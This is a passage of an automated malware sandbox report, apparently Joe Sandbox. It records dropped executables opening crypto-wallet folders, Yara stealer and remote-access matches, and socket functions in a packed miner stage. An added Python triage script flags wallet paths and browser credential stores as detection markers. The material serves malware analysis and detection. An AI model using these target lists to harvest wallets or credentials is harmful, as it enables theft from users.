Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
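The WMI SecurityCenter/SecurityCenter2 queries, the MachineGuid lookup and the File opened lines above are the behavioural evidence for the stealer, but they are scattered across mergedALL.exe and fix.exe among hundreds of benign lines. The Python below is an added example, not part of the report or of Joe Sandbox: it parses lines in this report's "Source: <process> <event>: <detail>" format, strips the "Jump to behavior" link text that the HTML export leaves on some lines, and groups the events that matter for stealer triage by process. The sample lines are constructed in the report's format from events shown above; the category names and the path markers are this example's own choices (the wallet directory names are the ones the report lists).

```python
import re
from collections import defaultdict

# Constructed excerpt in the report's line format (some lines carry the
# "Jump to behavior" link text that the HTML export leaves behind).
SAMPLE_REPORT = r"""
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
"""

# Event labels seen in this report; the process path may contain spaces, so
# the label list is what tells the parser where the path ends.
EVENT_LABELS = ("WMI Queries", "File opened", "Key value queried",
                "Queries volume information", "Code function",
                "String found in binary or memory")
LINE_RE = re.compile(
    r"^Source: (?P<proc>.+?) (?P<event>"
    + "|".join(re.escape(label) for label in EVENT_LABELS)
    + r"): (?P<detail>.*?)(?: Jump to behavior)?$")

# Markers chosen for this example from the paths the report lists.
BROWSER_STORES = ("\\Login Data", "\\Cookies", "\\Web Data",
                  "\\Extension Cookies", "cookies.sqlite")
WALLET_DIRS = ("\\atomic\\", "\\Binance\\", "\\Coinomi\\", "\\Electrum\\",
               "\\Ethereum\\wallets", "\\Exodus\\", "\\Guarda\\",
               "\\com.liberty.jaxx\\")
SECURITY_CLASSES = ("AntivirusProduct", "AntiSpyWareProduct", "FirewallProduct")


def parse_line(line):
    """Return (process, event, detail) with the link text removed, or None."""
    m = LINE_RE.match(line.strip())
    return (m["proc"], m["event"], m["detail"]) if m else None


def classify(event, detail):
    """Map one event to a triage category, or None for noise."""
    if (event == "WMI Queries" and "SecurityCenter" in detail
            and detail.endswith(SECURITY_CLASSES)):
        return "security-product enumeration"
    if event == "Key value queried" and detail.endswith("MachineGuid"):
        return "host fingerprint (MachineGuid)"
    if event == "File opened":
        if any(marker in detail for marker in WALLET_DIRS):
            return "crypto-wallet directory"
        if detail.endswith(BROWSER_STORES):
            return "browser credential/cookie store"
    return None


def triage(report_text):
    """Group categorised events by source process: {proc: {category: [detail]}}."""
    findings = defaultdict(lambda: defaultdict(list))
    for line in report_text.splitlines():
        parsed = parse_line(line)
        if not parsed:
            continue
        proc, event, detail = parsed
        category = classify(event, detail)
        if category:
            findings[proc][category].append(detail)
    return {proc: dict(cats) for proc, cats in findings.items()}


if __name__ == "__main__":
    for proc, cats in triage(SAMPLE_REPORT).items():
        print(proc)
        for category, details in cats.items():
            print(f"  {category}: {len(details)} event(s)")
```

Run against the full report text, the output shows at a glance that both dropped executables enumerate security products through SecurityCenter2 and touch the same wallet directories, while Notepad.exe (the PyInstaller-packed miner stage) never appears in the stealer categories.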
Source: Yara match File source: 10.0.fix.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Setup.exe.313a458.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Setup.exe.313a458.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.1686994806.0000000000722000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2525381623.0000000003494000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Setup.exe PID: 6184, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fix.exe, type: DROPPED

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 10.0.fix.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Setup.exe.313a458.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Setup.exe.313a458.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.mergedALL.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2524237107.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.1686994806.0000000000722000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1690804968.00000000030F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1671099792.0000000000FE2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Setup.exe PID: 6184, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\mergedALL.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fix.exe, type: DROPPED
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE10306078 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct, 19_2_00007FFE10306078
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE10305074 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct, 19_2_00007FFE10305074
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13206078 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct, 48_2_00007FFE13206078
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE13205074 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct, 48_2_00007FFE13205074
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0E175074 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct, 57_2_00007FFE0E175074
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0E176078 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct, 57_2_00007FFE0E176078